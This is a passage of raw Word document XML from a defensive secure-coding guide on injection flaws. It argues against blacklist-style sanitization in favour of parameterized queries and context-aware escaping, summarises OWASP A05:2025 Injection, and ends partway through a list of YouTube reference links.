          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">characters like , , , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) can severely degrade UX. For instance, a user named </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>O'Connor</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a company named </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>AT&amp;T</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> will find themselves locked out of a registration form because a naive validation filter flags their legitimate names as potential SQL or XML injection payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44966D7C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Striking the Balance:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Do not try to solve the injection problem entirely at the input validation layer. Use input validation strictly to enforce business logic boundaries </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(e.g., verifying an age field only contains digits, or an email matches a standard format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F301E4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow the user to input their necessary special characters, but ensure that the application handles them safely at the output/interpreter boundary using </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>parameterization</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>context-aware escaping</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . This keeps the user experience seamless while maintaining absolute backend protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C6B7B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Developer Education: The #1 Misconception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD43DDA"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 xml:space="preserve">Despite years of industry-wide awareness, injection flaws are frequently re-introduced into codebases due to a single, pervasive misconception among developers: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The belief that "Sanitization" is a universal shield.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255AAD1"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The Bad Habit: Relying on Blacklists &amp; String Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86C680"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 xml:space="preserve">The most common mistake developers make is attempting to manually scrub or filter user input strings using blacklists (e.g., writing a function that strips out words like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or specific terminal characters like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A0DA3"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This approach almost always fails for two primary reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A3134" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Context Blindness:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A character that is perfectly safe in an HTML context can be catastrophic if passed directly to a database or a system shell. A single string filter cannot account for every downstream interpreter the data might visit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE9600" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers are highly adept at finding edge cases, alternative encodings (like double URL encoding), or non-traditional whitespace characters that slip past custom regex filters but are completely understood by the backend SQL engine or OS shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD2617" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Secure Mindset Shift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AAFAA6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Teams must be trained to stop asking, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"How do I clean this dangerous input?"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start asking, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"How do I keep this input contained so it can never be executed as code?"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The ultimate goal of developer education is to shift the team's reliance away from surface-level input scrubbing and anchor it entirely in structural data isolation—treating user data as an inanimate payload that is passed safely into pre-compiled, parameterized frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E9849" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C04E43C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerability Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP A05:2025 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4C915" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk Level: Critical to High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C930B10" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Primary Root Cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It occurs when untrusted user-supplied input is dynamically concatenated into an application command or query string rather than being treated strictly as an isolated data parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C35E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Quick Detection Method:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SAST Taint Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map data paths from unvalidated input sources to execution sinks, supplemented by </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>DAST Time-Based Fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., injecting execution sleep delays) on live endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C0D78" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ultimate Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The complete architectural separation of the data plane from the control plane through the mandatory use of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Parameterized Interfaces (Prepared Statements)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and safe, argument-isolated native APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E06D17" w14:textId="15991936" w:rsidR="00C93359" w:rsidRPr="00C93359" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key Business Danger: Full Remote Code Execution (RCE) and Severe Data Breach</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , leading to the complete loss of intellectual property, regulatory non-compliance fines under GDPR/HIPAA, and permanent erosion of customer trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADA3CB" w14:textId="6B795EAB" w:rsidR="00D66BA1" w:rsidRPr="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93359">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC15CD8" w14:textId="77777777" w:rsidR="00C93359" w:rsidRPr="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93359">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Top Overview Guides</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07137DF3" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10 Explained:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11D37E97" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10 2025 Deep Dive:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="citation-21"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC19E1" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10 2025 Application Design Flaws:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="citation-20"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69C153" w14:textId="77777777" w:rsidR="00C93359" w:rsidRPr="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93359">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Targeted Category Walkthroughs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A7F45" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A01:2025 - Broken Access Control Masterclass:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4761460B" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A02:2025 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BugQuest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Security Misconfigurations:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Watch on YouTube</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79C8F4E0" w14:textId="77777777" w:rsidR="00C93359" w:rsidRDefault="00C93359" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A03:2025 - Software Supply Chain Failures Review:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
